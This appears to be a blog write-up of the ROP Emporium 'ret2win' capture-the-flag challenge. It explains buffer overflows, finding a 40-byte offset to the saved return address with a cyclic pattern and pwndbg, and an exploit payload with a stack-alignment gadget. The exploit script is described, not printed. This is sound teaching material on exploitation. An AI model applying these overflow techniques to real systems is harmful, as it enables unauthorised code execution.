In this hacking challenge, I go over how to exploit a buffer overflow vulnerability to redirect program execution to an arbitrary memory location of our choosing. To get your head up to speed, a buffer overflow vulnerability is a vulnerability that overwrites a predefined buffer by overwriting the contents of that said buffer with more than it can hold.
Suppose a buffer has been allocated with 10 bytes and you insert 12 bytes into that buffer, that can be called a buffer overflow. There are quite a few intricacies that go into exploiting buffer overflows like knowing the function being used to allow for user input but that can be a simple overview of a buffer overflow vulnerability.
In a normal buffer overflow exploitation CTF scenario, we would be required to insert shellcode onto the stack and jump to it, either to bin/cat flag.txt or execute a execve("/bin/sh", 0,0) syscall to pop a shell on the remote server. To follow this writeup, you'll need a basic understanding of how the stack works in memory as well as assembly language
This challenge is called ret2win, meaning that there is a ret2win() function located within the program and we need to jump to that function in order to get the flag. To remove all the details and to summarize, the way to achieve this is to overwrite the saved return address on the stack or the 'ret' instruction in order to redirect execution to where the address of the win() function is in memory.
To exploit the challenge, a cyclic pattern needs to be generated and inserted into the program to induce a program crash. pwndbg (exploit development gdb extension that makes debugging easier) will show where exactly the program has crashed.
Program crashes at 32 bytes after input. So 32 + 8 bytes (of RBP register) = 40 bytes from input all the way to RIP (saved return address). Since the RIP points to the next instruction to be executed, we need to insert the address of the win() function to successfully exploit the program.
A simple exploit script has been written to exploit the vulnerability and get the flag.
the script just prepares the defines the challenge process, defines the payload variable with the 40 byte padding, the ret address (to be explained after this lmao) and the ret2win address. It sends the payload to the local challenge process and recieves the flag if the first 4 letters match, indicating the challenge has been pwned!
A small issue while developing the script was the issue of the stack misalignment in Ubuntu 18.04 and up. Luckily, ROP Emporium challenge creators hinted at this to allow for the exploit dev to be more easier. That is the reason for the address in between the 40 byte padding and the ret2win address in the payload variable.
running the script prints the flag.
Challenge complete!
No comments:
Post a Comment